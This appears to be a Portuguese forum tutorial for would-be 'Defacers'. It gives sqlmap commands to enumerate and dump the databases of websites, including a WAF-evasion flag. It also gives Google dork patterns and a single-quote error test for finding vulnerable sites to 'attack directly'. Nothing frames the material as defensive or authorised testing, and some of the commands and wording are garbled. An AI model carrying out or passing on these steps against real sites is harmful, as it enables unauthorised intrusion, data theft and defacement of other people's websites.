O Sqlmap é uma ferramenta de código aberto que automatiza a detecção de SQL Injection e a exploração de vulnerabilidades em aplicativos da web . Quase todos os parâmetros usados no sqlmap são parâmetros com funções importantes. Neste tópico, são fornecidas informações sobre alguns desses parâmetros e são mostrados exemplos.
Se o sqlmap não estiver instalado ou não existir, você pode obtê-lo aqui: https://github.com/sqlmapproject/sqlmap
VAMOS COMEÇAR...
Como todo Defacer sabe, o parâmetro sqlmap usado é o -u ou --url parâmetro que representa a URL. Conforme visto em uso, ele apresenta a URL do site de destino para o sqlmap:
$ sqlmap -u " https://examplesite.com/news.php?id=000 " --dbs
[Às vezes, os sites WAF têm firewalls, ele trava neles sqlmap Se continuar dando erro e disser 403 proibido, você pode ignorá-los assim:
$ sqlmap -u " https://example.com/news.php?id=000 " --random-agent --batch - -dbs
Como você pode ver, os bancos de dados existentes Temos a lista.
Agora que temos um banco de dados, vamos puxar as tabelas deste banco de dados, e para isso usaremos este comando:
$ sqlmap -u " https://example.com/news.php?id=000 " -D nome do banco de dados - -tables
Como você pode ver, as tabelas existentes Agora, vamos começar abrindo as
tabelas:
$ sqlmap -u " https://example.com/news.php?id=000 " -D nome do banco de dados -T nome da tabela
-- colunas Agora que abrimos, vamos ver os textos nestas colunas.
Para ver os textos nas colunas, usaremos este código:
$ sqlmap -u " https://example.com/news.php?id=000" -D nome do banco de dados -T nome da tabela -C coluna o que você deseja obter --dump
Agora está tudo ok, o resto está em suas mãos agora usaremos o termo chamado dork para encontrar a vulnerabilidade no site A definição do Dork é:
O que é DORK Para que serve? > Sites com vulnerabilidade Dork sql É o código que nos ajuda a encontrá-lo. Hackers iniciantes são muito necessários porque é muito fácil hackear sites com sql
abertos manualmente. De acordo com o que aprendemos com Dork , vamos encontrar o site:
Primeiro de tudo, pesquise os idiotas que você tem na caixa de pesquisa do google e digite qualquer site, o site deve ter um valor de id, exemplo:
examplesite Se houver um lugar como .com/news?php id=000 onde diz id 000, esse site é baseado em sql.
Mas tudo bem, como encontramos a vulnerabilidade no site?
Como eu disse, quando nos deparamos com um site, coloque " (aspas duplas) ou ' (aspas simples) no final da url do site...
Se você notar um código de erro no site, pode assumir esse site como Eu descrevi
o Erro: Você tem um erro na sua sintaxe SQL, verifique o manual que corresponde à versão do seu servidor MySQL para a sintaxe correta para usar perto de ''000''' na linha 1 Se
você vir este erro, ataque diretamente .php? id= declaração_more.php?decl_id= Pageid= games.php?id= newsDetail.php?id= staff_id= historialeer.php?num= product-item.php?id= news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opiniões.php?id=
spr.php?id=
pages.php?id=
inurl:show.php?id=
show.php?id=
Os mais óbvios são estes dois documentos:
inurl:show.php?id=
show.php?id=
Muito obrigado aos amigos que chegaram até aqui.